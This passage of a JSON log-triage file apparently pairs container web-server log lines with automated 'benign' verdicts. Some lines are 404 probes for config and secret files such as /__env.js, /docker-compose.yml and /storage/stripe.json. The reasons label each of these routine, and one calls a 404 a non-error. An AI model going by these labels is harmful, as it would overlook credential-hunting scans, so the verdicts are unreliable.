"\u001b[0mGET /index.js.map \u001b[33m404\u001b[\u003cDUR\u003e 0.804 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:25:38.273915742Z" }, "7af4010cc4dca5f1c77ae711c9dd5ecd00245bb9e8146620cc892a719c77a3a1": { "type": "hash", "value": "7af4010cc4dca5f1c77ae711c9dd5ecd00245bb9e8146620cc892a719c77a3a1", "source": "auto", "reason": "HTTP GET request to a specific API endpoint returning 304 (not modified) with low latency, typical of normal application/CDN caching behavior.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 21.418 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:31:06.761552354Z" }, "7b125921c5af5665d9acdcc28d900d973aa6a6e1901560b7d73a0d46d76f3c3f": { "type": "hash", "value": "7b125921c5af5665d9acdcc28d900d973aa6a6e1901560b7d73a0d46d76f3c3f", "source": "auto", "reason": "Routine HTTP GET to an application logs endpoint returning 304 (not modified), with normal latency.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 20.375 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:28:27.839479356Z" }, "7c020934c3add8d6766ba86e8e448ba599e7feeead5fd9d37cd87f2134c87a87": { "type": "hash", "value": "7c020934c3add8d6766ba86e8e448ba599e7feeead5fd9d37cd87f2134c87a87", "source": "auto", "reason": "Regular HTTP GET for a missing resource (404) typical in web servers; not indicative of attack.", "original_line": "\u001b[0mGET /storage/stripe.json \u001b[33m404\u001b[\u003cDUR\u003e 0.911 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:29:52.016574034Z" }, "7d9c9cfa0068edd740ead778591421e550dee5a6271aa6b522f0331a0df6efe2": { "type": "hash", "value": "7d9c9cfa0068edd740ead778591421e550dee5a6271aa6b522f0331a0df6efe2", "source": "auto", "reason": "Regular HTTP request to a path returning 404; no evidence of malicious activity or authentication failure.", "original_line": "\u001b[0mGET /checkout \u001b[33m404\u001b[\u003cDUR\u003e 0.579 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:11:27.303014592Z" }, "7de7f1f4fa58f4fa3e0d3389915946207a64083f38c5cce1ca11bcc688311ff2": { "type": "hash", "value": "7de7f1f4fa58f4fa3e0d3389915946207a64083f38c5cce1ca11bcc688311ff2", "source": "auto", "reason": "Regular HTTP 404 on a GET asset/view path; nothing indicates malicious activity", "original_line": "\u001b[0mGET /debug/default/view \u001b[33m404\u001b[\u003cDUR\u003e 0.581 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:35:09.607977772Z" }, "7df88f73924ae34f4011310e560b417da0a28c419582f063d06d32bd67d5f3cb": { "type": "hash", "value": "7df88f73924ae34f4011310e560b417da0a28c419582f063d06d32bd67d5f3cb", "source": "auto", "reason": "Looks like a routine HTTP GET to a versioned API endpoint returning status 304 (not modified) with a small latency.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 56.151 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:39:45.778129947Z" }, "7e26e5eb4769f22ae28af1b6517564865ab1130a8f07cb4f60585428ff8561cc": { "type": "hash", "value": "7e26e5eb4769f22ae28af1b6517564865ab1130a8f07cb4f60585428ff8561cc", "source": "auto", "reason": "HTTP GET for a missing file (404) is a normal access pattern and not indicative of abuse; treated as routine traffic.", "original_line": "\u001b[0mGET /storage/logs/stripe.log \u001b[33m404\u001b[\u003cDUR\u003e 0.552 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:35:32.643884845Z" }, "7e2f4e285df00a8482c14eb5a5aa58f2a90ba617b7eefc00eca6250743e58b9d": { "type": "hash", "value": "7e2f4e285df00a8482c14eb5a5aa58f2a90ba617b7eefc00eca6250743e58b9d", "source": "auto", "reason": "Standard HTTP access log showing a 404 for /pricing; not indicative of attack or misconfiguration by itself.", "original_line": "\u001b[0mGET /pricing \u001b[33m404\u001b[\u003cDUR\u003e 0.568 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:16:05.327150957Z" }, "7e458a0c1b7b49d82bc8671d881016f199b993fba49d90844ddf73ae42acc227": { "type": "hash", "value": "7e458a0c1b7b49d82bc8671d881016f199b993fba49d90844ddf73ae42acc227", "source": "auto", "reason": "Routine informational message about updating/renewing load balancer certificates; no exploit indicators present.", "original_line": "\u001b[36mMarch 19th \u003cNUM\u003e, 10:31:35.413 pm \u001b[0mUpdating Load Balancer - renewAllCerts", "created_at": "2026-03-19T22:31:36.620210532Z" }, "7e8f5ae422cacf0c073df8810097509e7ae250cbf8d54f29679eacee4dc43760": { "type": "hash", "value": "7e8f5ae422cacf0c073df8810097509e7ae250cbf8d54f29679eacee4dc43760", "source": "auto", "reason": "HTTP GET to application logs endpoint returning 304 (not modified) with a response time; appears like routine container access traffic.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 20.738 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:35:42.944532561Z" }, "8026133a899ec7ab47b9c9489313ea0f2bdb2d610648d33b0b47b0750590c354": { "type": "hash", "value": "8026133a899ec7ab47b9c9489313ea0f2bdb2d610648d33b0b47b0750590c354", "source": "auto", "reason": "Appears to be a routine HTTP GET request to an application logs endpoint returning 304 (not modified).", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 21.795 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:39:26.095776337Z" }, "8098f0a31cdb39789794214164079274629d5ba5daf2c402f7d746349f995c73": { "type": "hash", "value": "8098f0a31cdb39789794214164079274629d5ba5daf2c402f7d746349f995c73", "source": "auto", "reason": "Looks like a routine HTTP GET to an internal API endpoint with a 304 (not modified) response and an observed latency.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 22.533 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:32:12.900336463Z" }, "80e9f88aee76612b36f9829b72a1f41149da669ccbfcf3d9dae19b4378da7f23": { "type": "hash", "value": "80e9f88aee76612b36f9829b72a1f41149da669ccbfcf3d9dae19b4378da7f23", "source": "auto", "reason": "Looks like a routine HTTP GET returning 304 (not modified) for an API logs endpoint; response time is normal and no error indicators are present.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 20.924 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:34:15.800939802Z" }, "8120f646c10e7003ae6b0f0eb4ddd2bae810e54b933bd095982e9acc18dac76c": { "type": "hash", "value": "8120f646c10e7003ae6b0f0eb4ddd2bae810e54b933bd095982e9acc18dac76c", "source": "auto", "reason": "Routine HTTP GET request to an internal API endpoint returning 304 (not modified) with a small latency; appears like normal proxy/app access logging.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 22.025 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:37:15.902012573Z" }, "8175260d409293a95c652bdbe7e5b1292471a809645b717ef8ab3f44f1b41ee1": { "type": "hash", "value": "8175260d409293a95c652bdbe7e5b1292471a809645b717ef8ab3f44f1b41ee1", "source": "auto", "reason": "Routine HTTP GET request to an application logs endpoint returning 304 (not modified); includes typical request/response timing.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 24.487 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:41:25.868617539Z" }, "81b091801f420f84ad7fd82448a6d85e29a08dcf8eca387ec1918a89673d9187": { "type": "hash", "value": "81b091801f420f84ad7fd82448a6d85e29a08dcf8eca387ec1918a89673d9187", "source": "auto", "reason": "Looks like a normal HTTP GET request to an application API returning 304 (not modified) with a short duration; typical of routine client polling/caching.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 21.244 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:41:27.841726181Z" }, "8239b6b09fd118a375fb1dfe4a294895f605d36ae71e81740053897dd8288931": { "type": "hash", "value": "8239b6b09fd118a375fb1dfe4a294895f605d36ae71e81740053897dd8288931", "source": "auto", "reason": "Normal HTTP 404 response for a common asset; no indicators of malicious activity.", "original_line": "\u001b[0mGET /docker-compose.yml \u001b[33m404\u001b[\u003cDUR\u003e 0.588 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:31:49.282178991Z" }, "82c82ee737be8848523d177760df7fca11f378633f6e5768b98a42f3a25ec8f5": { "type": "hash", "value": "82c82ee737be8848523d177760df7fca11f378633f6e5768b98a42f3a25ec8f5", "source": "auto", "reason": "Routine HTTP GET request to application logs endpoint returning 304 (not modified); latency in milliseconds suggests normal client polling.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 20.608 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:39:12.77885754Z" }, "84b1c5068b46251254167536b14488a327c37c4b5eb6a98e4aea01b523e4ce5a": { "type": "hash", "value": "84b1c5068b46251254167536b14488a327c37c4b5eb6a98e4aea01b523e4ce5a", "source": "auto", "reason": "Looks like a routine HTTP GET request to an application logs endpoint returning 304 (not modified), with a normal response time.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 22.754 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:25:15.7343809Z" }, "853aad7e7313342769f3b0d8065464e2df9a7b1886f27a8b5eac3cd6b2628d61": { "type": "hash", "value": "853aad7e7313342769f3b0d8065464e2df9a7b1886f27a8b5eac3cd6b2628d61", "source": "auto", "reason": "Looks like a routine HTTP GET to an application logs endpoint returning 304 (not modified) with normal latency.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 19.005 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:42:09.812619719Z" }, "85f44d06de8fad7016e971af7fc812bf47f2ad0b7cb673ac95b56701e602b74f": { "type": "hash", "value": "85f44d06de8fad7016e971af7fc812bf47f2ad0b7cb673ac95b56701e602b74f", "source": "auto", "reason": "Appears to be a normal HTTP GET request to an API endpoint returning 304 (not modified) with a sub-50ms duration.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 21.456 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:39:57.64923991Z" }, "88281cb1090109bab5d6938d815428b034dad52fc3a9b92402f0fd1a1abb2461": { "type": "hash", "value": "88281cb1090109bab5d6938d815428b034dad52fc3a9b92402f0fd1a1abb2461", "source": "auto", "reason": "HTTP GET to a versioned API endpoint returning 304 (not modified) with a normal latency; appears to be routine client caching behavior.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 23.008 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:36:51.849078578Z" }, "88539786b17123f94ae3e50051ef45f8482955b43e8c92ee9f9443a11af1d9d2": { "type": "hash", "value": "88539786b17123f94ae3e50051ef45f8482955b43e8c92ee9f9443a11af1d9d2", "source": "auto", "reason": "Looks like a routine HTTP GET request returning 304 (not modified) for an API logs endpoint with normal latency.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 21.838 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:34:18.959650466Z" }, "88cff053555115af6e2e46f38f06883ae9e5820914946f88cf920b114441a29a": { "type": "hash", "value": "88cff053555115af6e2e46f38f06883ae9e5820914946f88cf920b114441a29a", "source": "auto", "reason": "Routine HTTP GET to an application logs endpoint returning 304 Not Modified with low latency.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 20.677 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:39:36.693317993Z" }, "8913d87a7c07f1883a6e0f34d806127f0520d0773001ed2a87e414375598d809": { "type": "hash", "value": "8913d87a7c07f1883a6e0f34d806127f0520d0773001ed2a87e414375598d809", "source": "auto", "reason": "Normal HTTP GET request for manifest.json returning 200 OK with a small duration; typical health/service operation", "original_line": "\u001b[0mGET /manifest.json \u001b[32m200\u001b[\u003cDUR\u003e 1.598 ms - 355\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:25:52.426657246Z" }, "8ae955bbafe0dff57cf95543d6efd38b47d772dac56eaa98e26d56a448e5cfb9": { "type": "hash", "value": "8ae955bbafe0dff57cf95543d6efd38b47d772dac56eaa98e26d56a448e5cfb9", "source": "auto", "reason": "Routine HTTP GET request to an API endpoint returning 304 (not modified), with a typical request duration field.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 23.290 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:41:31.023712936Z" }, "8af6ad8f2bc45021b542dc68e4d6eca04136f1241abbd8337f30eb2dc068fcd5": { "type": "hash", "value": "8af6ad8f2bc45021b542dc68e4d6eca04136f1241abbd8337f30eb2dc068fcd5", "source": "auto", "reason": "Routine HTTP request to an application logs endpoint returning 304 (not modified); latency appears normal and no explicit error or exploit content is present.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 33.150 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:36:12.96832076Z" }, "8b735f75150b3f58cae4ee135ebe8bd2ac81e173b0121aa222a58807a7f3638b": { "type": "hash", "value": "8b735f75150b3f58cae4ee135ebe8bd2ac81e173b0121aa222a58807a7f3638b", "source": "auto", "reason": "Routine HTTP GET request to an application logs endpoint returning 304 Not Modified; timing present and no obvious exploit markers.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 21.600 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:28:18.650148891Z" }, "8bef22111b979a3315bba8a9ac5ef36f299ea7d07e86de558cf21a2189837cf1": { "type": "hash", "value": "8bef22111b979a3315bba8a9ac5ef36f299ea7d07e86de558cf21a2189837cf1", "source": "auto", "reason": "Routine HTTP GET request to an application logs endpoint with a 304 status and low latency; appears like normal API access/conditional retrieval.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 20.965 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:32:57.711829981Z" }, "8d4ccc343898fa441271a3acf52a5a20060fb44376554dae606df42dd641e653": { "type": "hash", "value": "8d4ccc343898fa441271a3acf52a5a20060fb44376554dae606df42dd641e653", "source": "auto", "reason": "Standard HTTP 404 access to /shop is common in web services and not indicative of an attack.", "original_line": "\u001b[0mGET /shop \u001b[33m404\u001b[\u003cDUR\u003e 0.539 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:11:32.969713422Z" }, "8d86402d3cee12e9a6d8b1ab8731a4b3ec04d472c111d8df789a4171d185b043": { "type": "hash", "value": "8d86402d3cee12e9a6d8b1ab8731a4b3ec04d472c111d8df789a4171d185b043", "source": "auto", "reason": "Routine HTTP GET to an application logs endpoint returning 304 (Not Modified) with sub-minute latency; typical of client polling/caching behavior.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 19.812 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:34:57.677638107Z" }, "8dc4958bf44546c8e0b1353956f48522cd7cca5afe2221927a6c6ecaebf280f0": { "type": "hash", "value": "8dc4958bf44546c8e0b1353956f48522cd7cca5afe2221927a6c6ecaebf280f0", "source": "auto", "reason": " normal HTTP GET request resulting in a 404 for sitemap.xml; appears to be routine traffic and not indicative of an attack", "original_line": "\u001b[0mGET /sitemap.xml \u001b[33m404\u001b[\u003cDUR\u003e 0.585 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:18:28.023779244Z" }, "8e79c2f1433b630f4f1acc538f3683056bcd331985518d77318c298a4147add1": { "type": "hash", "value": "8e79c2f1433b630f4f1acc538f3683056bcd331985518d77318c298a4147add1", "source": "auto", "reason": "Standard benign HTTP access log showing a 404 for /shop with a short processing duration.", "original_line": "\u001b[0mGET /shop \u001b[33m404\u001b[\u003cDUR\u003e 2.092 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:17:28.166521219Z" }, "8f06353652ba4fd15fad3ae0925be1b55a8c95f3b41edb4e77b71a68b5d0bb3c": { "type": "hash", "value": "8f06353652ba4fd15fad3ae0925be1b55a8c95f3b41edb4e77b71a68b5d0bb3c", "source": "auto", "reason": "Routine scheduled/operational execution of certbot to list certificates in a container.", "original_line": "\u001b[36mMarch 19th \u003cNUM\u003e, 10:31:30.895 pm \u001b[0mexecuteCommand Container: captain-certbot certbot certificates --non-interactive", "created_at": "2026-03-19T22:31:32.002648584Z" }, "90047e941590122fe2a14a7792feee51c2d9a81e3852387a5bf30a1d9d0b2e46": { "type": "hash", "value": "90047e941590122fe2a14a7792feee51c2d9a81e3852387a5bf30a1d9d0b2e46", "source": "auto", "reason": "Normal HTTP access log indicating a successful request (200 OK) with standard response time and size.", "original_line": "\u001b[0mGET / \u001b[32m200\u001b[\u003cDUR\u003e 0.715 ms - 978\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T10:32:36.849369712Z" }, "90a1f841139eddc91f15bc3e3b551a8acd63a84dbd0bf08350b37489144bc92f": { "type": "hash", "value": "90a1f841139eddc91f15bc3e3b551a8acd63a84dbd0bf08350b37489144bc92f", "source": "auto", "reason": "Looks like a routine HTTP GET request to an application logs endpoint with a 304 status and a small latency.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 20.026 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:28:55.118757039Z" }, "9135034423e383d95c84496f9df38a1833dc7edbd3c439e7e15e7ef3ea68ace0": { "type": "hash", "value": "9135034423e383d95c84496f9df38a1833dc7edbd3c439e7e15e7ef3ea68ace0", "source": "auto", "reason": "Normal HTTP GET request to a config path with a successful status code.", "original_line": "\u001b[0mGET /api/config.map \u001b[32m200\u001b[\u003cDUR\u003e 0.512 ms - 83\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:31:31.764342021Z" }, "91a99a72a25e7fd21191bbb029bc70f10f9c129cafe5effe5dd5efee22404927": { "type": "hash", "value": "91a99a72a25e7fd21191bbb029bc70f10f9c129cafe5effe5dd5efee22404927", "source": "auto", "reason": "Normal HTTP access log line showing a standard GET request to a non-error path with a small duration", "original_line": "\u001b[0mGET /admin/config \u001b[33m404\u001b[\u003cDUR\u003e 0.601 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:31:04.258600827Z" }, "91f712e977414b6f9ecabf6c4d819c01f3e7e81455444919e6e2aa28a66b0f86": { "type": "hash", "value": "91f712e977414b6f9ecabf6c4d819c01f3e7e81455444919e6e2aa28a66b0f86", "source": "auto", "reason": "Appears to be a routine HTTP GET request to an application log endpoint returning 304 (not modified) with a measured latency.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 18.640 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:25:39.766506867Z" }, "928053d55e4b0e0db6d1214edf3c6e6aeb39e7ba3257f919cba06daaa23707b3": { "type": "hash", "value": "928053d55e4b0e0db6d1214edf3c6e6aeb39e7ba3257f919cba06daaa23707b3", "source": "auto", "reason": "Normal static-file access (robots.txt) with standard 200 response; typical web server log pattern.", "original_line": "\u001b[0mGET /robots.txt \u001b[32m200\u001b[\u003cDUR\u003e 0.713 ms - 26\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T12:34:52.695704611Z" }, "937198a1a7bcefc0603666a82651369ef0e16bf9ea003f65912b96f7671fb822": { "type": "hash", "value": "937198a1a7bcefc0603666a82651369ef0e16bf9ea003f65912b96f7671fb822", "source": "auto", "reason": "Routine HTTP GET to application logs endpoint with a 304 Not Modified response; typical request/response logging from a web service.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 22.018 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:32:45.599732791Z" }, "941cb0a8bc0d0e192d545a217e4bb3e3acb6b89851d78777b81789629cf1f73b": { "type": "hash", "value": "941cb0a8bc0d0e192d545a217e4bb3e3acb6b89851d78777b81789629cf1f73b", "source": "auto", "reason": "Routine HTTP GET request to an API endpoint returning 304 (Not Modified); no exploit indicators.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 21.364 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:36:18.725198577Z" }, "955e594a928e66d65528bfba22a0ad6e47402acbbcb4ef5f317301e22269e60f": { "type": "hash", "value": "955e594a928e66d65528bfba22a0ad6e47402acbbcb4ef5f317301e22269e60f", "source": "auto", "reason": "Looks like a normal HTTP GET request to an application endpoint returning 304 (not modified) with a typical latency value.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 21.739 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:27:12.957112072Z" }, "95759a934fadf559af35b47d4e0c14b27537f9dcc1583c88c45985e924f4f87e": { "type": "hash", "value": "95759a934fadf559af35b47d4e0c14b27537f9dcc1583c88c45985e924f4f87e", "source": "auto", "reason": "Regular asset request resulting in 404; common benign client behavior unless repeated or unusual.", "original_line": "\u001b[0mGET /bundle.js \u001b[33m404\u001b[\u003cDUR\u003e 0.994 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:24:56.199817876Z" }, "957c69915a3ac215cc176a144137d2da6f2df2d5f530ba1615131b676b770fd1": { "type": "hash", "value": "957c69915a3ac215cc176a144137d2da6f2df2d5f530ba1615131b676b770fd1", "source": "auto", "reason": "Looks like a normal HTTP GET request to an application API endpoint with a 304 status and reported latency; no signs of exploitation or errors.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 22.217 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:39:16.022265784Z" }, "9592785e7fb5bc9e2646e102b6bcfdee4bc0b5ca5dff571b796867202c984945": { "type": "hash", "value": "9592785e7fb5bc9e2646e102b6bcfdee4bc0b5ca5dff571b796867202c984945", "source": "auto", "reason": "Normal HTTP request to a missing resource (404) with a small, routine duration.", "original_line": "\u001b[0mGET /donate \u001b[33m404\u001b[\u003cDUR\u003e 0.772 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:16:19.958079346Z" }, "960c070699805afb885ae78b899f86800540fa96d16b48cc8d333efeef3fe793": { "type": "hash", "value": "960c070699805afb885ae78b899f86800540fa96d16b48cc8d333efeef3fe793", "source": "auto", "reason": "Regular HTTP request for a common environment file returning 404 is a routine operation and not indicative of a threat.", "original_line": "\u001b[0mGET /__env.js \u001b[33m404\u001b[\u003cDUR\u003e 11.343 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:25:14.902802662Z" }, "96b371afba51834fe141214b3b1e7e2e060af9e6c26a4d3d954bf1a8644f8029": { "type": "hash", "value": "96b371afba51834fe141214b3b1e7e2e060af9e6c26a4d3d954bf1a8644f8029", "source": "auto", "reason": "Normal HTTP 200/404 access log entry indicating a missing resource; low risk and common in web services.", "original_line": "\u001b[0mGET /storage/logs/payments.log \u001b[33m404\u001b[\u003cDUR\u003e 1.521 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:35:36.329505787Z" }, "981a97094ab949ce14e3e9f5772bfe8b86a31318d7857d33d392196a5a915298": { "type": "hash", "value": "981a97094ab949ce14e3e9f5772bfe8b86a31318d7857d33d392196a5a915298", "source": "auto", "reason": "Looks like a normal HTTP GET request to an internal API endpoint with a 304 status and request timing.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 19.289 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:33:36.577719643Z" }, "985551512a8ef1528fe479f5551173d606d383d041ad986b65ec8578236d7000": { "type": "hash", "value": "985551512a8ef1528fe479f5551173d606d383d041ad986b65ec8578236d7000", "source": "auto", "reason": "HTTP GET to an application API returning 304 (not modified) with a small response time; appears to be normal access logging from the container.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api \u001b[36m304\u001b[\u003cDUR\u003e 2.289 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:34:24.751381886Z" }, "99d248018671fa6cd6a9a775194ed9148a6154023ebc0baa2d07362e78ce8ecf": { "type": "hash", "value": "99d248018671fa6cd6a9a775194ed9148a6154023ebc0baa2d07362e78ce8ecf", "source": "auto", "reason": "Routine HTTP GET to an application logs endpoint returning 304 (not modified), with a normal latency.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 23.056 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:31:27.658674822Z" }, "9a1d88d3ce70f720271781bd7805ba93617324bfa2019d29c0c5d0a65de37568": { "type": "hash", "value": "9a1d88d3ce70f720271781bd7805ba93617324bfa2019d29c0c5d0a65de37568", "source": "auto", "reason": "Looks like a routine HTTP GET request to an application logs endpoint returning 304 (not modified) with a normal latency.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 21.898 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:35:09.831380272Z" }, "9b80c12af9512a307fccf50d55f9acacaf8f753c61cebe5da98d40fc5b0edb8d": { "type": "hash", "value": "9b80c12af9512a307fccf50d55f9acacaf8f753c61cebe5da98d40fc5b0edb8d", "source": "auto", "reason": "Looks like a normal HTTP GET request to an application logs endpoint with a 304 status code and typical latency.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 39.274 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:25:03.622712185Z" }, "9bb37d0fcfa3c4f3ab262b59ccd9f5f80ee46994ba61fdfb8665fe433baf3779": { "type": "hash", "value": "9bb37d0fcfa3c4f3ab262b59ccd9f5f80ee46994ba61fdfb8665fe433baf3779", "source": "auto", "reason": "Looks like a normal HTTP GET request being logged by a Dockerized service, returning 304 with a typical latency value.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 35.587 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:42:33.993252468Z" }, "9bd200c0ad958412df3355eaf53fbea99ae189acd08bcb0b23c9d05f4c700c58": { "type": "hash", "value": "9bd200c0ad958412df3355eaf53fbea99ae189acd08bcb0b23c9d05f4c700c58", "source": "auto", "reason": "Regular HTTP GET to an application API endpoint with a 304 status and a latency value; appears like normal request logging.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 20.601 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:43:00.880869257Z" }, "9c43ed462b3e8c8a1faaaa530bb11808e22373e2caba38f8dea769b5ff0f5fe3": { "type": "hash", "value": "9c43ed462b3e8c8a1faaaa530bb11808e22373e2caba38f8dea769b5ff0f5fe3", "source": "auto", "reason": "Appears to be a routine HTTP GET to an application logs endpoint returning 304 (not modified) with a normal latency.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 26.579 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:36:03.937737929Z" }, "9c9b2f955664f6bcfd8ab2e15437257a5230a0e6ae7d8a0802c0ea87db1587dc": { "type": "hash", "value": "9c9b2f955664f6bcfd8ab2e15437257a5230a0e6ae7d8a0802c0ea87db1587dc", "source": "auto", "reason": "Normal HTTP 404 response to a static asset in a web server; common during asset probing or build tool usage.", "original_line": "\u001b[0mGET /.vite/manifest.json.map \u001b[33m404\u001b[\u003cDUR\u003e 1.138 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:26:25.060300251Z" }, "9eef77ebed5ea9d510abce037502fcd37fb0e4d8a620b59420085d9be6cb76cc": { "type": "hash", "value": "9eef77ebed5ea9d510abce037502fcd37fb0e4d8a620b59420085d9be6cb76cc", "source": "auto", "reason": "Routine HTTP GET request to an internal API endpoint with a 304 status and reasonable latency.", "original_line": 